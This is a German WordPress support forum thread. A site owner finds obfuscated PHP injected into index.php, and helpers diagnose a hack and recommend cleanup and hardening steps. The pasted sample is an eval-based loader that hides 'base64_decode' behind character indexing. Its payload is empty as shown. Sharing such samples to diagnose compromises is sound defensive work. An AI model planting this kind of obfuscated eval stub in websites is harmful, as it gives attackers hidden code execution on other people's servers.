Support » Allgemeine Fragen » In index.php wird automatisch Code geschrieben

  • Gelöst BBworx

    (@bbworx)


    Hallo Community,
    vielleicht ja jmd eine Idee.
    In meine Index.php wird automatisch Code geschrieben. Ich habe sie schon durch die aktuelle ersetzt. Habe keine Idee, wie der da reinkommt. Die Seite läuft, vermute aber, dass das nicht so gut ist ;-(
    Vielen Dank für Eure Hilfe

    Die Seite, für die ich Hilfe brauche: [Anmelden, um den Link zu sehen]

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Was für Code wird denn da reingeschrieben?

    Thread-Starter BBworx

    (@bbworx)

    <?php $O00OO0=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdq");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O("")); ?><?php define("WP_USE_THEMES", true); require( dirname( __FILE__ ) . "/wp-blog-header.php" );

    Deine Seite wurde gehackt. Ganz schnell offline nehmen und ein Backup einspielen

    Thread-Starter BBworx

    (@bbworx)

    Danke für die schnelle Antwort

    Das Backup wird wohl dann mit dem Hack sein.
    Was kann ich denn jetzt machen um das zu beheben?
    Gibt es da tools?

    Wenn du nicht lange im Forum suchen magst, kannst du meine Anleitung zur Reparatur einer gehackten Website hier nachlesen:

    https://pixolin.de/gehackte-website-reparieren/

    Thread-Starter BBworx

    (@bbworx)

    Das mache ich sehr sehr gerne – Danke Dir

    Schau dir bitte auch die Access Logs an (Analyse Tool).

    Um die Seite besser abzusichern, empfehle ich die NinjaFirewall (im Dashboard unbedingt den Full WAF Mode aktivieren, damit die Firewall per auto_prepend_file vor und nicht in der Seite läuft).

    Den Login zusätzlich per WPS Hide Login umzubenennen, kann auch nicht schaden.
    Die letzten Tage hatte ich bei den bearbeiteten Hacks immer wieder User Logins aus dem fernen Ausland mit Schadcode-Plugin Installation (namens WP-Clean-Plugin). Perfekt getarnt.. 🙂

    Thread-Starter BBworx

    (@bbworx)

    Hi @kitepascal und @pixolin
    Vielen Dank für Eure Hilfe. Sollte jetzt Fort Knox sein 😉
    Schönes Wochenende Euch

Ansicht von 8 Antworten - 1 bis 8 (von insgesamt 8)
  • Das Thema „In index.php wird automatisch Code geschrieben“ ist für neue Antworten geschlossen.